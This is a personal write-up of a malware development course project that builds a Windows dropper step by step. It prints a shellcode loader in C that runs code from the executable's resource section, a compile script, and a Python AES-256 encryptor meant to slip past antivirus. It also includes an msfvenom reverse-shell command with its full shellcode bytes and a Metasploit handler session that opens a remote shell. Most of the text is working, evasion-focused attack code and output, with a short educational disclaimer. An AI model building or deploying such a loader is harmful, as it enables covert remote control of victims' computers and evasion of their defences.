Sektor7 - Malware Development Essentials Project

The final project code will be uploaded onto my github for reference. The purpose of this writeup is for educational purposes, do not test on systems you do not own or have permissions for testing!

Overview

This project is a compilation of various techniques utilized in the Sektor7 Red Team Operations: Malware Development Essentials course. In addition, to enhance my understanding and practical skills, I have made modifications to certain aspects of the primary combined project. For instance, I have replaced the message box shellcode with Metasploit shellcode.

The following picture provides an illustration of the high-level execution flow which contains the techniques learned from the course.

To explain the illustration further:

• The payload will be shellcode that is AES256 encrypted. Encrypting shellcode, specifically with a strong encryption algorithm like AES256, can provide several benefits in terms of evasion. For instance, encryption can help to obfuscate it and make it more difficult to detect by antivirus or intrusion detection systems. Since the encrypted shellcode will appear as random data, it will be harder for automated detection systems to recognize it as malicious code. In addition, this will evade any static/signature based detections by AV (antivirus) engines.

• The payload itself will be a staged payload generated from msfvenom using the payload option: windows/x64/shell/reverse_tcp .

• Within the dropper, it will be stored within the .rsrc portion of the executable.

• The dropper executable itself will have encrypted strings and obfuscated function calls. When analysts do static analysis, using a tool like strings or FLOSS will reveal any string that is statically saved within the program. In addition, when examining a program without function call obfuscation (specifically to Windows API), analysts will be able to see which Windows API functions it utilizes. And when using certain APIs like VirtualProtect or CreateRemoteThread without obfuscation, it can give indicators to analysts that the program is malicious. With obfuscation, it is harder (not impossible) for analysts to easily see which Windows API functions the program utilizes.

• The payload itself will be stored within the .rsrc (resource) portion of the dropper executable.

• The payload will be decrypted and injected into a remote (a different) process, where that remote process will then execute the payload.

Implant Initial Version: Storing Payload in Resource Section

I’ll start of the project small and will be implementing each technique one at a time. Starting with a smaller subset of the project or problem allows you to focus on a limited set of requirements, which reduces the complexity and helps to understand the problem space better. This allows you to build a strong foundation and gradually increase the complexity of the project as it progresses. The first step will be to store an unencrypted payload in the resource section of the executable, and see if we can get the payload to work.

So this first version of the implant will simply have the unencrypted (reverse shell) payload that will be stored in the resource section. There will also not be any process injection in this initial version.

First I created the payload using msfvenom on my kali linux VM. The command I used to generated the payload was msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.246 LPORT=4444 -f raw -o payload.ico

Since the payload we’re implementing for now is unencrypted, it will be caught by Microsoft Defender and automatically be quarantined/removed. After allowing the payload through defender, I was able to download it on my malware development VM.

I’ve taken most of the code from the code skeleton given out in the Sektor7 course, however I have added plenty of comments, removed the print statements, and changed some of the variable names to make it easier read and interpret what is going on.

Variable Declaration

void * payload_memory_buffer; 	    // pointer to the memory buffer that stores the extracted payload
BOOL virtualprotect_return_value; 	// flag to see if VirtualProtect returned successfully
HANDLE thread_handle; 				      // handle for the newly created thread
DWORD old_protection = 0; 			    // used to store the previous memory protection of the allocated buffer
HGLOBAL resource_handle = NULL; 	  // handle to store return value from LoadResource() Win API
HRSRC resource; 					          // handle to store return value from FindResource() Win API
	
unsigned char * payload_data; 		  // pointer to the actual data of the payload
unsigned int payload_size; 			    // size of the payload data in bytes

First portion of the code declares the variables that will be used throughout the program. Each variable has a description next to it, so it is pretty self explanatory.

Retrieving Payload from Resource Section

// ==========================================================
// GET THE PAYLOAD FROM RESOURCE SECTION
// Find resource, load into memory, lock the loaded resource,
// return a pointer to its data, then get the payload size
// ==========================================================
resource = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);
resource_handle = LoadResource(NULL, resource);
payload_data = (char *) LockResource(resource_handle);
payload_size = SizeofResource(NULL, resource);

This portion of the code is responsible for retrieving the payload from the resource section (.rsrc) of the executable.

The first line of code shown above uses the Windows API function FindResource() to locate the binary resource with the name FAVICON_ICO of type RT_RCDATA (which stands for "resource data") within the executable file. The NULL parameter specifies that the function should look for the resource in the program's own executable file, rather than in a separate resource file or library. The function returns a handle to the located resource if successful, or NULL if the resource is not found.

The following line uses the Windows API function LoadResource() to load the binary resource into memory. The NULL parameter specifies that the function should load the resource from the program's own executable file, and the resource parameter (from the previous line) is a handle to the resource that was returned by FindResource(). The function returns a handle to the loaded resource if successful, or NULL if an error occurs. This will store the payload in an area of memory that is read only, so it cannot be executed from here.

The third line uses the Windows API function LockResource() to obtain a pointer to the binary data that was loaded into memory by LoadResource(). The data is cast to a char* pointer, which allows it to be treated as a character array. This pointer is stored in the variable payload_data.

The last line uses the Windows API function SizeofResource() to determine the size of the binary resource in bytes. The NULL parameter specifies that the function should calculate the size of the resource within the program's own executable file, and the resource parameter is a handle to the resource that was returned by FindResource(). The function returns the size of the resource in bytes if successful, or 0 if an error occurs. The size is stored in the variable payload_size.

TLDR of this section:

1. Locates the binary payload within the resource portion of its own executable

2. Loads the binary (payload) resource into memory

3. Obtain a pointer to the binary data that was loaded into memory from step 2

4. Determine the size of the binary resource in bytes

Loading the Payload into the Process Memory

// ========================================================
// LOAD THE PAYLOAD INTO THE PROCESS MEMORY 
// Allocate memory in the current process, copy the payload 
// into the new memory block, and change the protection 
// of the memory block to allow it to be executed
// ========================================================
payload_memory_buffer = VirtualAlloc(0, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(payload_memory_buffer, payload_data, payload_size);
virtualprotect_return_value = VirtualProtect(payload_memory_buffer, payload_size, PAGE_EXECUTE_READ, &old_protection);

This portion of the code is responsible for allocating a block of memory in the process's virtual address space, copying the contents of a binary resource to the allocated memory block, and changing the protection attributes of the memory block to allow the payload to be executed but not modified. The Windows API functions used in these lines of code are VirtualAlloc(), RtlMoveMemory(), and VirtualProtect().

The first line of code uses the Windows API function VirtualAlloc() to allocate a block of memory in the process's virtual address space. The function takes three parameters: the first parameter is the starting address of the block, which is set to 0 to let the system choose a suitable address; the second parameter is the size of the block in bytes, which is set to the value of the variable payload_size; and the third parameter is a combination of flags that determine the type of memory allocation, which is set to MEM_COMMIT | MEM_RESERVE to allocate a committed and reserved block of memory. The function returns a pointer to the first byte of the allocated block, which is stored in the variable payload_memory_buffer.

The next of code uses the Windows API function RtlMoveMemory() to copy the contents of the binary resource, which are stored in the variable payload_data, to the allocated memory block, which is stored in the variable payload_memory_buffer. The function takes three parameters: the first parameter is a pointer to the destination memory block, which is set to the value of payload_memory_buffer; the second parameter is a pointer to the source memory block, which is set to the value of payload_data; and the third parameter is the size of the memory block to copy, which is set to the value of payload_size. The function performs a memory copy operation and returns nothing.

The last line of code within the screenshot uses the Windows API function VirtualProtect() to change the protection attributes of the memory block that was allocated in the first line of code. The function takes four parameters: the first parameter is a pointer to the starting address of the memory block, which is set to the value of payload_memory_buffer; the second parameter is the size of the memory block in bytes, which is set to the value of payload_size; the third parameter is a combination of flags that determine the new protection attributes, which is set to PAGE_EXECUTE_READ to allow the memory block to be executed but not modified; and the fourth parameter is a pointer to a variable that receives the previous protection attributes of the memory block, which is set to the value of old_protection. The function returns a non-zero value if successful, or zero if an error occurs.

TLDR of this section:

1. Allocate a block of memory in the process's virtual address space

2. Copy the payload into the allocated block of memory from step 1

3. Allow the memory block to be executed

Executing the Payload

// ======================================================================
// EXECUTE THE PAYLOAD
// If the buffer protection was changed successfully, create a new thread 
// that starts executing the code located at the beginning of the 
// allocated buffer then wait indefinitely for the thread to terminate
// ======================================================================
if ( virtualprotect_return_value != 0 ) 
{
	thread_handle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) payload_memory_buffer, 0, 0, 0);
	WaitForSingleObject(thread_handle, -1);
}

Now that all the memory operations have been completed and the payload has been copied over to a region of memory that can be executed; execute the payload if successful.

The if statement checks whether the VirtualProtect() function call in the previous code block was successful by testing if the return value is not zero. If VirtualProtect() was successful, it means that the memory block allocated with VirtualAlloc() has been configured with the appropriate protection attributes to allow it to be executed.

If VirtualProtect() was successful, the code creates a new thread of execution using the CreateThread() function. The function takes several parameters: the first parameter is a pointer to a security descriptor that determines how the new thread will access system resources, the second parameter is the initial size of the stack for the new thread (0 indicates that the system will allocate a default size), the third parameter is a pointer to the entry point function for the new thread, which in this case is a pointer to the start of the allocated memory buffer containing the payload data, the fourth parameter is a parameter that is passed to the entry point function, and the final two parameters are reserved and set to 0.

Once the thread is created, the code waits for it to complete using the WaitForSingleObject() function. The function takes two parameters: the first parameter is a handle to the thread, which is returned by the CreateThread() function, and the second parameter is a timeout value that specifies how long the function should wait for the thread to complete. In this case, the timeout value is set to -1, which means the function will wait indefinitely for the thread to complete.

TLDR of this section:

1. Check whether the VirtualProtect() function call was successful

2. Create a new thread of execution where entry point is the start of the allocated memory buffer containing the payload data

3. Wait for the thread (execution) to complete

Compiling

The following is the compilation script (saved in compile.bat)

@ECHO OFF

rc resources.rc
cvtres /MACHINE:x64 /OUT:resources.o resources.res
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o

• @ECHO OFF: This command turns off command echoing in the command prompt.

• rc resources.rc: This command runs the Windows resource compiler (rc) to compile a resource script file named "resources.rc" into a binary resource file named "resources.res". A resource file typically contains non-executable data such as icons, bitmaps, sounds, or other types of resources that an application may need. The following is the contents inside resources.rc:

  #include "resources.h"
  
  FAVICON_ICO RCDATA payload.ico

  This associates the binary data of a file named payload.ico with a resource identifier named FAVICON_ICO that can be accessed and used by the C++ code.

• cvtres /MACHINE:x64 /OUT:resources.o resources.res: This command converts the binary resource file "resources.res" into an object file named "resources.o" that can be linked with the C++ code. The "/MACHINE:x64" option specifies the target architecture, and the "/OUT:resources.o" option specifies the output file name.

• cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o: This command compiles the C++ source file named "implant.cpp" into an executable file named "implant.exe". The "/nologo" option disables displaying the logo of the C++ compiler, the "/Ox" option enables maximum optimization, the "/MT" option links with the static multithreaded runtime library, the "/W0" option disables warnings, the "/GS-" option disables security checks, the "/DNDEBUG" option defines the NDEBUG preprocessor macro to disable debug information, and the "/Tcimplant.cpp" option specifies the C++ source file name. The "/link" option specifies that the compiler should also perform linking, and the "/OUT:implant.exe" option specifies the output file name. The "/SUBSYSTEM:CONSOLE" option specifies that the program should be compiled as a console application, and the "/MACHINE:x64" option specifies the target architecture. Finally, the "resources.o" option specifies the object file generated from the resource file.

In summary:

• rc resources.rc will compile the resource script resources.rc into a binary resource file (puts the payload into “FAVICON_ICO”)

• cvtres /MACHINE:x64 /OUT:resources.o resources.res will convert the binary resource file into an object file named resources.o that can be linked with the C++ code

• cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o will compile the C++ code and link it with the binary data within the resources.o file to produce a complete executable program

Running compile.bat should compile and output implant.exe.

Setting up Metasploit

Next, I set up Metasploit's multi handler which would act as our mock command and control (C2).

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell/reverse_tcp
PAYLOAD => windows/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.246
LHOST => 192.168.1.246
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/x64/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.246    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.246:4444 
[*] Sending stage (336 bytes) to 192.168.1.244
[*] Command shell session 1 opened (192.168.1.246:4444 -> 192.168.1.244:61236) at 2023-03-13 19:48:29 -0500

Shell Banner:
Microsoft Windows [Version 10.0.19044.2604]
(c) Microsoft Corporation. All rights reserved.
-----
          

C:\Users\developer\Desktop\Combined Project>

After multi handler was set up, I ran the implant.exe executable and I got a reverse shell as shown on the bottom. This proves that this initial version of the implant works!

Examining the First Implant

Recall this is how we created the payload for this implant: msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.246 LPORT=4444 -f raw -o payload.ico

This creates the binary in a raw format, though we can see the hex values if we set the output format to something like C:

$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.246 LPORT=4444 -f c

No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
unsigned char buf[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x4d\x31\xc9\x48\x0f\xb7\x4a\x4a"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x8b\x48"
"\x18\x50\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\x41\xc1\xc9"
"\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\xf6\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";

Opening the implant executable within PE-bear, you can see the different sections under the drop down on the left side, and within it there’s the .rsrc section. Clicking that and looking a little down, you can see the same MSF venom payload in hex at the following offsets:

Offset(h)

0001A860  FC 48 83 E4 F0 E8 CC 00 00 00 41 51 41 50 52 48  üHƒäðèÌ...AQAPRH
0001A870  31 D2 51 65 48 8B 52 60 48 8B 52 18 48 8B 52 20  1ÒQeH‹R`H‹R.H‹R 
0001A880  56 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0  VH‹rPH.·JJM1ÉH1À
0001A890  AC 3C 61 7C 02 2C 20 41 C1 C9 0D 41 01 C1 E2 ED  ¬<a|., AÁÉ.A.Áâí
0001A8A0  52 48 8B 52 20 41 51 8B 42 3C 48 01 D0 66 81 78  RH‹R AQ‹B<H.Ðf.x
0001A8B0  18 0B 02 0F 85 72 00 00 00 8B 80 88 00 00 00 48  ....…r...‹€ˆ...H
0001A8C0  85 C0 74 67 48 01 D0 50 44 8B 40 20 8B 48 18 49  …ÀtgH.ÐPD‹@ ‹H.I
0001A8D0  01 D0 E3 56 4D 31 C9 48 FF C9 41 8B 34 88 48 01  .ÐãVM1ÉHÿÉA‹4ˆH.
0001A8E0  D6 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1  ÖH1À¬AÁÉ.A.Á8àuñ
0001A8F0  4C 03 4C 24 08 45 39 D1 75 D8 58 44 8B 40 24 49  L.L$.E9ÑuØXD‹@$I
0001A900  01 D0 66 41 8B 0C 48 44 8B 40 1C 49 01 D0 41 8B  .ÐfA‹.HD‹@.I.ÐA‹
0001A910  04 88 48 01 D0 41 58 41 58 5E 59 5A 41 58 41 59  .ˆH.ÐAXAX^YZAXAY
0001A920  41 5A 48 83 EC 20 41 52 FF E0 58 41 59 5A 48 8B  AZHƒì ARÿàXAYZH‹
0001A930  12 E9 4B FF FF FF 5D 49 BE 77 73 32 5F 33 32 00  .éKÿÿÿ]I¾ws2_32.
0001A940  00 41 56 49 89 E6 48 81 EC A0 01 00 00 49 89 E5  .AVI‰æH.ì ...I‰å
0001A950  49 BC 02 00 11 5C C0 A8 01 F6 41 54 49 89 E4 4C  I¼...\À¨.öATI‰äL
0001A960  89 F1 41 BA 4C 77 26 07 FF D5 4C 89 EA 68 01 01  ‰ñAºLw&.ÿÕL‰êh..
0001A970  00 00 59 41 BA 29 80 6B 00 FF D5 6A 0A 41 5E 50  ..YAº)€k.ÿÕj.A^P
0001A980  50 4D 31 C9 4D 31 C0 48 FF C0 48 89 C2 48 FF C0  PM1ÉM1ÀHÿÀH‰ÂHÿÀ
0001A990  48 89 C1 41 BA EA 0F DF E0 FF D5 48 89 C7 6A 10  H‰ÁAºê.ßàÿÕH‰Çj.
0001A9A0  41 58 4C 89 E2 48 89 F9 41 BA 99 A5 74 61 FF D5  AXL‰âH‰ùAº™¥taÿÕ
0001A9B0  85 C0 74 0A 49 FF CE 75 E5 E8 93 00 00 00 48 83  …Àt.IÿÎuåè“...Hƒ
0001A9C0  EC 10 48 89 E2 4D 31 C9 6A 04 41 58 48 89 F9 41  ì.H‰âM1Éj.AXH‰ùA
0001A9D0  BA 02 D9 C8 5F FF D5 83 F8 00 7E 55 48 83 C4 20  º.ÙÈ_ÿÕƒø.~UHƒÄ 
0001A9E0  5E 89 F6 6A 40 41 59 68 00 10 00 00 41 58 48 89  ^‰öj@AYh....AXH‰
0001A9F0  F2 48 31 C9 41 BA 58 A4 53 E5 FF D5 48 89 C3 49  òH1ÉAºX¤SåÿÕH‰ÃI
0001AA00  89 C7 4D 31 C9 49 89 F0 48 89 DA 48 89 F9 41 BA  ‰ÇM1ÉI‰ðH‰ÚH‰ùAº
0001AA10  02 D9 C8 5F FF D5 83 F8 00 7D 28 58 41 57 59 68  .ÙÈ_ÿÕƒø.}(XAWYh
0001AA20  00 40 00 00 41 58 6A 00 5A 41 BA 0B 2F 0F 30 FF  .@..AXj.ZAº./.0ÿ
0001AA30  D5 57 59 41 BA 75 6E 4D 61 FF D5 49 FF CE E9 3C  ÕWYAºunMaÿÕIÿÎé<
0001AA40  FF FF FF 48 01 C3 48 29 C6 48 85 F6 75 B4 41 FF  ÿÿÿH.ÃH)ÆH…öu´Aÿ
0001AA50  E7 58 6A 00 59 49 C7 C2 F0 B5 A2 56 FF D5 00 00  çXj.YIÇÂðµ¢VÿÕ..

Furthermore, within the center of PE-bear (can alternatively do this within pestudio) there is the “Imports” folder where you can see all the Windows API functions being called. Within it are the API functions used to execute the implant:

• FindResource

• VirtualAlloc

• VirtualProtect

• CreateThread

All of these Windows APIs being called together are indicative that this file is potentially malicious.

Furthermore, it is also worth noting that Windows defender immediately blocked the original ico file, and the implant executable once it was compiled and ran.

Now to make the implant more stealthy.

Implant Upgrade 1: Encrypting the Payload with AES-256

Python Encryptor

For this portion, the Sektor7 course provides python code that will encrypt a supplied binary file with AES256 and output the contents in hex values along with a randomized key. However there were a couple issues with the code:

• It runs on python 2 - I was able to reproduce the steps in the course to create the encrypted payload in an environment that had python version 2.7 installed. However, attempting to run the code in python3 results in errors

• It outputs the resulting payload in an encoded byte string in C format to make it copy-pastable into C/C++ code

I took the course python 2 implementation code of encryption a binary file to AES256 and implemented it in python 3 with some slight variations. Here is the code:

import sys
import os
from Crypto.Cipher import AES
from Crypto.Hash import SHA256

def generate_key():
    return os.urandom(16)

def pad(s):
    return s + (AES.block_size - len(s) % AES.block_size) * bytes([AES.block_size - len(s) % AES.block_size])

def aesenc(plaintext, key):
    k = SHA256.new(key).digest()
    print("k =", end=" ")
    print(', '.join(f'0x{byte:02x}' for byte in k))
    iv = 16 * b'\x00'
    plaintext = pad(plaintext)
    cipher = AES.new(k, AES.MODE_CBC, iv)
    return cipher.encrypt(plaintext)

if len(sys.argv) < 2:
    print(f"File argument needed! Usage: {sys.argv[0]} <raw payload file> [-of output_file]")
    sys.exit()

try:
    with open(sys.argv[1], "rb") as file:
        plaintext = file.read()
except FileNotFoundError:
    print(f"File not found: {sys.argv[1]}")
    sys.exit()

key = generate_key()
ciphertext = aesenc(plaintext, key)

key_c_byte_string = ', '.join(f'0x{byte:02x}' for byte in key)
payload_c_byte_string = ', '.join(f'0x{byte:02x}' for byte in ciphertext)

print(f'unsigned char AESkey[] = {{ {key_c_byte_string} }};')
print(f'unsigned char payload[] = {{ {payload_c_byte_string} }};')

if len(sys.argv) == 4 and sys.argv[2] == "-of":
    output_filename = sys.argv[3]
    with open(output_filename, "wb") as output_file:
        output_file.write(ciphertext)
        print("")
        print("[+] Output file argument used")
        print("[+] Wrote contents in binary format to: {0}".format(output_filename))
        print("")

Here’s what the python code does at a high level overview:

1. If a file is supplied, it gets loaded and the contents are saved into the variable plaintext

2. A key that is of length 16 bytes is generated randomly (note that AES256 requires a 32 byte key)

3. The 16 byte key is put into a SHA-256 hash function which assigns the resulting hash to the variable k, this result is a 32 byte long key

4. The resulting key from step 3, and an IV of all hex values of 0’s are used to AES encrypt the plaintext in CBC mode. The result is stored into the ciphertext variable

5. The ciphertext is printed in hex values in a format that can be copy-pasteable into C/C++ code

6. If the argument -of is used followed by a filename when the python 3 code is run, then it will also output the cipher text into a file in binary format

Implementing the Encrypted Payload in the Implant

Running the above python file: python3 aes256_encrypt.py payload_unenc.ico -of payload_enc.ico

I got the resulting key: unsigned char AESkey[] = { 0xbc, 0x1a, 0xbc, 0x9e, 0xce, 0xa3, 0x0b, 0x8a, 0x42, 0xc4, 0xb2, 0x2b, 0xb4, 0x5f, 0x49, 0xd1 };

Next, I took the code template for AES-256 decryption from the Sektor7 course and added it as a function to the implant code from above:

// code template from Sektor7 course
int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
        HCRYPTPROV hProv;
        HCRYPTHASH hHash;
        HCRYPTKEY hKey;

        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
                return -1;
        }
        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
                return -1;
        }
        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
                return -1;              
        }
        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
                return -1;
        }
        
        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, payload, &payload_len)){
                return -1;
        }
        
        CryptReleaseContext(hProv, 0);
        CryptDestroyHash(hHash);
        CryptDestroyKey(hKey);
        
        return 0;
}

AESDecrypt, performs AES decryption using a provided key on an input payload. It leverages the Windows Cryptography API (CryptoAPI) for the cryptographic operations. The following is a high level overview/summary of what this template does:

• Acquire a cryptographic service provider (CSP) context for performing cryptographic operations.

• Create a hash object using the SHA-256 algorithm.

• Hash the provided key using the created hash object.

• Derive an AES-256 symmetric key from the hashed key.

• Decrypt the input payload using the derived AES-256 key.

• Release the acquired cryptographic context and destroy the created hash object and derived key object.

• Return 0 on successful execution, or -1 if any of the cryptographic operations fail.

In summary, it AES-256 decrypts the ciphertext using the key which is calculated from getting a SHA-256 of the 16 byte key that was randomized by the above python code.

Next, I inserted the following line of code to call the decryption function after the RtlMoveMemory command: AESDecrypt((char *) payload_memory_buffer, payload_size, key, sizeof(key)); this will take that memory region, cast it as a char pointer, and decrypt it in place.

I added print statements before and getchar() calls around the decryption function so that I can see it getting decrypted in memory. Below is the modified portion in code where the payload gets loaded into memory:

// ========================================================
// LOAD THE PAYLOAD INTO THE PROCESS MEMORY 
// Allocate memory in the current process, copy the payload 
// into the new memory block, and change the protection 
// of the memory block to allow it to be executed
// ========================================================
payload_memory_buffer = VirtualAlloc(0, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(payload_memory_buffer, payload_data, payload_size);
	
printf("Before decryption: %-20s : 0x%-016p\n", "payload_memory_buffer addr", (void *)payload_memory_buffer);
printf("\nInput anything\n");
getchar();
	
AESDecrypt((char *) payload_memory_buffer, payload_size, key, sizeof(key));
virtualprotect_return_value = VirtualProtect(payload_memory_buffer, payload_size, PAGE_EXECUTE_READ, &old_protection);
	
printf("After decryption:%-20s : 0x%-016p\n", "payload_memory_buffer addr", (void *)payload_memory_buffer);
printf("\nInput anything\n");
getchar();

I then changed the resources.rc to the new payload name.

Next, I compiled/ran the code and started the Metasploit multi/handler session. Looking into the memory by attaching it in x64 debugger:

C:\Users\developer\Desktop\Combined Project>compile.bat
Microsoft (R) Windows (R) Resource Compiler Version 10.0.10011.16384
Copyright (C) Microsoft Corporation.  All rights reserved.

Microsoft (R) Windows Resource To Object Converter Version 14.35.32215.0
Copyright (C) Microsoft Corporation.  All rights reserved.

implant.cpp

C:\Users\developer\Desktop\Combined Project>implant.exe
Before decryption: payload_memory_buffer addr : 0x000001D919200000

Input anything

The following is the hex values in the debugger before decryption:

000001D919200000  7D 83 D4 A1 B7 39 AC D2 C1 12 DE DC 5F ED 72 51  }.Ô¡·9¬ÒÁ.ÞÜ_írQ  
000001D919200010  AC 51 E8 F5 B2 87 DE 9D EB D8 15 D7 A7 7B 64 67  ¬Qèõ².Þ.ëØ.ק{dg  
000001D919200020  4C F9 92 7B 31 89 BC CA 47 27 C7 2A 2F 65 46 C1  Lù.{1.¼ÊG'Ç*/eFÁ  
000001D919200030  51 3B 60 2D 37 96 B2 AE E8 66 99 FD 0D 62 FA 49  Q;`-7.²®èf.ý.búI  
000001D919200040  7C 86 8E 4D 9A 7C FD 27 F9 CC CF BE 92 FD FD F9  |..M.|ý'ùÌϾ.ýýù  
000001D919200050  4D 15 3A A5 3D 3B 80 0C A0 BB 3D 40 02 EE 8D A0  M.:¥=;.. »=@.î.   
000001D919200060  89 4F AB 90 78 8F 5C A8 81 51 80 F2 E4 FC 1E 6A  .O«.x.\¨.Q.òäü.j  
000001D919200070  AE D3 BC 81 72 CE FC 2C 42 6D 97 35 06 11 00 EC  ®Ó¼.rÎü,Bm.5...ì  
000001D919200080  4A 98 0A D6 F0 1F FD AA AD C5 63 2C 7E AB 09 E5  J..Öð.ýª.Åc,~«.å  
000001D919200090  F4 A2 3D 61 13 1B C8 4F E9 76 CE 16 40 90 5A 6F  ô¢=a..ÈOévÎ.@.Zo  
000001D9192000A0  50 25 94 A7 FF 06 58 3A 82 AB 72 B3 BC EC 47 01  P%.§ÿ.X:.«r³¼ìG.  
000001D9192000B0  E8 B8 9C 8E 59 66 75 98 84 8F 60 F9 E7 2C 01 93  è¸..Yfu...`ùç,..  
000001D9192000C0  1E BD 22 BC D4 CC F0 9B F3 88 4A 64 32 05 7E D2  .½"¼ÔÌð.ó.Jd2.~Ò

Once the decryption function is called, here are the new hex values that are decrypted in the debugger:

000001D919200000  FC 48 83 E4 F0 E8 CC 00 00 00 41 51 41 50 52 51  üH.äðèÌ...AQAPRQ  
000001D919200010  56 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52  VH1ÒeH.R`H.R.H.R  
000001D919200020  20 48 0F B7 4A 4A 48 8B 72 50 4D 31 C9 48 31 C0   H.·JJH.rPM1ÉH1À  
000001D919200030  AC 3C 61 7C 02 2C 20 41 C1 C9 0D 41 01 C1 E2 ED  ¬<a|., AÁÉ.A.Áâí  
000001D919200040  52 41 51 48 8B 52 20 8B 42 3C 48 01 D0 66 81 78  RAQH.R .B<H.Ðf.x  
000001D919200050  18 0B 02 0F 85 72 00 00 00 8B 80 88 00 00 00 48  .....r.........H  
000001D919200060  85 C0 74 67 48 01 D0 44 8B 40 20 49 01 D0 8B 48  .ÀtgH.ÐD.@ I.Ð.H  
000001D919200070  18 50 E3 56 4D 31 C9 48 FF C9 41 8B 34 88 48 01  .PãVM1ÉHÿÉA.4.H.  
